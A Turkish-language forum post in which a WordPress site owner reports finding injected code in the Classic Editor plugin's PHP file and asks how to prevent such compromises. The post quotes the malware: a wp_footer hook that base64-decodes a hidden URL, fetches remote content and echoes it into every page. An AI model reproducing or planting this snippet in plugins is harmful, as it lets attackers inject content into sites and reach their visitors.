Merhaba,
Wordpress'in klasik düzenleyici eklentisinin php dosyasına eklenmişti bu kod. 5-6 siteye footer çıkıyordu bulmam 2-3 saat sürdü..
Sitem trafik aldıkça hem olumlu sponsorluk mailleri hem ddos hemde bu tarz hacklenmelerle karşılaşıyorum. Önlem olarak ne önerirsiniz acaba? wp adminden sızılmamış, cpanelde 2fa var zaten ama wordpressin w*rez olmayan eklentisi bile olsa sızılabiliyor bunlara önlem olarak ne yapabilirim?
add_action('wp_footer', function() {
$url = base64_decode('aHR0cHM6Ly9tYW5hZ2VyLXVwZGF0ZS5ibG9nL2xpbmsvbGVvLmh0bWw=');
$content = file_get_contents($url);
if ($content !== false) {
echo $content;
}
});